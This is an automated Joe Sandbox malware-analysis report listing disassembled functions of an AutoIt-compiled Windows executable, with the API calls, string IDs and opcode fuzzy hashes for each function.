                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 146765662-0
                                                                                                                • Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                                                • Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
                                                                                                                • Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                                                • Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
                                                                                                                Function 00478373 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                                                                                                                  • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                                                                                                                  • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CopyVariant$ContainedObject$ErrorLast
                                                                                                                • String ID: AutoIt3GUI$Container
                                                                                                                • API String ID: 4053020530-3941886329
                                                                                                                • Opcode ID: a9ff7069b9b8d6ccd49eba872ad7efd2467de888f1098c4430e935d21ee713db
                                                                                                                • Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
                                                                                                                • Opcode Fuzzy Hash: a9ff7069b9b8d6ccd49eba872ad7efd2467de888f1098c4430e935d21ee713db
                                                                                                                • Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
                                                                                                                Function 0045427D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 259libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 0045435B
                                                                                                                • GetProcAddress.KERNEL32(?,AU3_FreeVar), ref: 00454371
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc
                                                                                                                • String ID: AU3_FreeVar
                                                                                                                • API String ID: 190572456-771828931
                                                                                                                • Opcode ID: 111e65442873bd7cbffe48700b84114c079de58427b558a04ef4a5d95244f0f0
                                                                                                                • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                                                                                                                • Opcode Fuzzy Hash: 111e65442873bd7cbffe48700b84114c079de58427b558a04ef4a5d95244f0f0
                                                                                                                • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
                                                                                                                Function 004667A7 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170shareCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Connection
                                                                                                                • String ID: LPT$HH
                                                                                                                • API String ID: 1722446006-2728063697
                                                                                                                • Opcode ID: 4168d29b7d0848dc605f9ce781fdb6688c60699af114ee795911c582be7b9077
                                                                                                                • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
                                                                                                                • Opcode Fuzzy Hash: 4168d29b7d0848dc605f9ce781fdb6688c60699af114ee795911c582be7b9077
                                                                                                                • Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
                                                                                                                Function 00466587 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: HH$HH
                                                                                                                • API String ID: 0-1787419579
                                                                                                                • Opcode ID: fed4e066af51e45fc8c5976399addcc25001bc25a5639efd16b547c1275b717f
                                                                                                                • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                                                                                                                • Opcode Fuzzy Hash: fed4e066af51e45fc8c5976399addcc25001bc25a5639efd16b547c1275b717f
                                                                                                                • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                                                                                                                Function 00448358 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: '
                                                                                                                • API String ID: 3850602802-1997036262
                                                                                                                • Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                                                • Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
                                                                                                                • Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                                                • Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
                                                                                                                Function 00401BE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                                                • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconLoadNotifyShell_String
                                                                                                                • String ID: Line:
                                                                                                                • API String ID: 3363329723-1585850449
                                                                                                                • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                                • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                                                                                                                • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                                • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B
                                                                                                                Function 0045126C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                                                                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: Combobox
                                                                                                                • API String ID: 3850602802-2096851135
                                                                                                                • Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                                                • Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
                                                                                                                • Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                                                • Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
                                                                                                                Function 004515AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 004515DA
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LengthMessageSendTextWindow
                                                                                                                • String ID: edit
                                                                                                                • API String ID: 2978978980-2167791130
                                                                                                                • Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                                                • Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
                                                                                                                • Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                                                • Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
                                                                                                                Function 00474827 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000000), ref: 00474833
                                                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 00474846
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemorySleepStatus
                                                                                                                • String ID: @
                                                                                                                • API String ID: 2783356886-2766056989
                                                                                                                • Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                                                                • Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
                                                                                                                • Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                                                                • Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
                                                                                                                Function 004222B1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\p4rsJEIb7k.exe,00000104), ref: 004222D1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleName
                                                                                                                • String ID: C:\Users\user\Desktop\p4rsJEIb7k.exe$lI
                                                                                                                • API String ID: 514040917-665794331
                                                                                                                • Opcode ID: 6471261ceed6c4e84fcd86acbbd5ec6f229b0cd72896a57254f0e496610a85db
                                                                                                                • Instruction ID: 949a5422ac16129abcdf6a7e13ae2ad22a8803a3c22bcf3cdebf143c23a23c82
                                                                                                                • Opcode Fuzzy Hash: 6471261ceed6c4e84fcd86acbbd5ec6f229b0cd72896a57254f0e496610a85db
                                                                                                                • Instruction Fuzzy Hash: CD11B172700229BB8B14CBA4FE808EE77A8EB49360765053FF511D3290EA78DE018768
                                                                                                                Function 004647A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: htonsinet_addr
                                                                                                                • String ID: 255.255.255.255
                                                                                                                • API String ID: 3832099526-2422070025
                                                                                                                • Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                                                                • Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
                                                                                                                • Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                                                                • Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
                                                                                                                Function 004694DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 3850602802-1403004172
                                                                                                                • Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                                                • Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
                                                                                                                • Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                                                • Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
                                                                                                                Function 00442AFE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InternetOpen
                                                                                                                • String ID: <local>
                                                                                                                • API String ID: 2038078732-4266983199
                                                                                                                • Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                                                                • Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
                                                                                                                • Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                                                                • Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
                                                                                                                Function 004695F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 3850602802-1403004172
                                                                                                                • Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                                                • Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
                                                                                                                • Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                                                • Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
                                                                                                                Function 0046956F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 3850602802-1403004172
                                                                                                                • Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                                                • Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
                                                                                                                • Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                                                • Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
                                                                                                                Function 004560AD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
                                                                                                                • wsprintfW.USER32 ref: 004560E9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
